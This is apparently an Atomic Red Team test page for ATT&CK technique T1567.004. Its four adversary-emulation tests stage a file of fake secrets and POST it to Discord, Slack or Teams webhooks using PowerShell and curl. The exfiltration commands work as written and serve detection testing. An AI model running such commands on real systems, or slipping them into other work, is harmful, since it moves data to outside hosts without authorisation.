T1567.004
Exfiltration Over Web Service: Exfiltration Over Webhook
Description from ATT&CK
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and
webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated Automated Exfiltration of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)
Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)
Atomic Tests
- Atomic Test #1: Exfiltrate staged data to a Discord webhook (PowerShell)
- Atomic Test #2: Exfiltrate staged file to a Discord webhook with curl (bash)
- Atomic Test #3: Exfiltrate staged data to a Slack webhook with curl (sh)
- Atomic Test #4: Exfiltrate staged data to a Microsoft Teams webhook (PowerShell)
Atomic Test #1: Exfiltrate staged data to a Discord webhook (PowerShell)
Stages a file containing simulated sensitive data and exfiltrates its contents to a
Discord incoming webhook by POSTing a JSON content payload over HTTPS. Webhook URLs
require no authentication header, so a single HTTPS POST is sufficient to move data out
of the environment while blending in with normal SaaS traffic.
See https://discord.com/developers/docs/resources/webhook#execute-webhook
Supported Platforms: Windows
auto_generated_guid: f0057c81-24dc-4a2e-b658-5809c242180b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Discord incoming webhook URL the staged data is exfiltrated to | string | https://discord.com/api/webhooks/000000000000000000/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | $env:TEMP\T1567.004_loot.txt |
Attack Commands: Run with powershell!
"secrets, api keys, passwords - T1567.004 atomic test" | Out-File -FilePath "#{staged_file}" -Encoding ascii
$body = @{ content = (Get-Content -Raw "#{staged_file}") } | ConvertTo-Json
Invoke-RestMethod -Uri "#{webhook_url}" -Method Post -ContentType 'application/json' -Body $bodyCleanup Commands
Remove-Item -Path "#{staged_file}" -ErrorAction IgnoreAtomic Test #2: Exfiltrate staged file to a Discord webhook with curl (bash)
Stages a file containing simulated sensitive data and uploads it as a multipart
file attachment to a Discord incoming webhook using curl. This produces an outbound
HTTPS POST to a commonly allow-listed SaaS endpoint, mirroring real-world data theft
that abuses Discord webhooks for exfiltration.
See https://discord.com/developers/docs/resources/webhook#execute-webhook
Supported Platforms: Linux, macOS
auto_generated_guid: 40c44d16-bb49-4d14-aafa-f9ba7e6e6c5b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Discord incoming webhook URL the staged data is exfiltrated to | string | https://discord.com/api/webhooks/000000000000000000/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | /tmp/T1567.004_loot.txt |
Attack Commands: Run with bash!
echo "secrets, api keys, passwords - T1567.004 atomic test" > "#{staged_file}"
curl -s -F "file=@#{staged_file}" "#{webhook_url}"Cleanup Commands
rm -f "#{staged_file}"Atomic Test #3: Exfiltrate staged data to a Slack webhook with curl (sh)
Stages a file containing simulated sensitive data and exfiltrates its contents to a
Slack incoming webhook by POSTing a JSON text payload with curl. Slack incoming
webhooks accept unauthenticated JSON POSTs, making them a low-friction exfiltration
channel that blends with legitimate collaboration traffic.
See https://api.slack.com/messaging/webhooks
Supported Platforms: Linux, macOS
auto_generated_guid: c666acd6-6ff5-4d28-9490-195d89cd4337
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Slack incoming webhook URL the staged data is exfiltrated to | string | https://hooks.slack.com/services/T00000000/B00000000/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | /tmp/T1567.004_loot.txt |
Attack Commands: Run with sh!
echo "secrets, api keys, passwords - T1567.004 atomic test" > "#{staged_file}"
curl -s -X POST -H 'Content-type: application/json' --data "{\"text\":\"$(cat #{staged_file})\"}" "#{webhook_url}"Cleanup Commands
rm -f "#{staged_file}"Atomic Test #4: Exfiltrate staged data to a Microsoft Teams webhook (PowerShell)
Stages a file containing simulated sensitive data and exfiltrates its contents to a
Microsoft Teams incoming webhook (Office 365 connector / Power Automate workflow URL)
by POSTing a JSON text payload over HTTPS. The endpoint resides on a Microsoft-owned
domain, allowing the exfiltration to blend in with trusted corporate traffic.
See https://learn.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/how-to/add-incoming-webhook
Supported Platforms: Windows
auto_generated_guid: 35ad6590-2207-4b14-bf8f-9899470d7156
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| webhook_url | Microsoft Teams incoming webhook URL the staged data is exfiltrated to | string | https://example.webhook.office.com/webhookb2/00000000-0000-0000-0000-000000000000@00000000-0000-0000-0000-000000000000/IncomingWebhook/ReplaceWithYourWebhookToken |
| staged_file | Path to the file that is staged and exfiltrated | path | $env:TEMP\T1567.004_loot.txt |
Attack Commands: Run with powershell!
"secrets, api keys, passwords - T1567.004 atomic test" | Out-File -FilePath "#{staged_file}" -Encoding ascii
$body = @{ text = (Get-Content -Raw "#{staged_file}") } | ConvertTo-Json
Invoke-RestMethod -Uri "#{webhook_url}" -Method Post -ContentType 'application/json' -Body $bodyCleanup Commands
Remove-Item -Path "#{staged_file}" -ErrorAction IgnoreAtomic test(s) for this technique last updated: 2026-06-24 08:27:25 UTC